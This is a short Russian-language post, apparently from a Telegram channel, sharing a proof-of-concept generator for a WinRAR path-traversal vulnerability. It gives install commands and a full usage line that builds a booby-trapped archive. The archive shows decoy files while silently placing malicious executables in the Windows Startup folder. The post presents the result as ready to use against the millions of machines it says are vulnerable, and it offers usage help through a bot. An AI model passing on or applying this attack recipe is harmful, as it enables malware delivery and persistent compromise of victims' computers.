WinRAR exploit POC-code

WinRAR exploit POC-code

@black_forum

https://github.com/manulqwerty/Evil-WinRAR-Gen

Это POC уязвимости которой был посвящён предыдущий пост.

Установка и запуск:

git clone https://github.com/manulqwerty/Evil-WinRAR-Gen.git
cd Evil-WinRAR-Gen && pip3 install -r requirements.txt
chmod +x evilWinRAR.py
./evilWinRAR.py


Использование:

./evilWinRAR.py -o evil.rar -e calc.exe l04d3r.exe -g hello.txt cats.jpeg -p 'C:\C:C:../AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\'


evil.rar - название архива

calc.exe l04d3r.exe - вредоносные exe

hello.txt cats.jpeg - файлы которые увидит пользователь при распаковке

Ппараметр ключа -p - путь куда перенесётся плохой файл, сейчас стоит перенос в автозагрузку

На выходе получаем готовый к использованию архив.


Скриншоты:

Зачем? У нас терминал!


Еесли возникли вопросы по поводу использования программы, то ждём в боте.

P.s. не забываем сохранить данную программу на диск, так как она может пропасть, уязвимость то в миллионах машин))

Report Page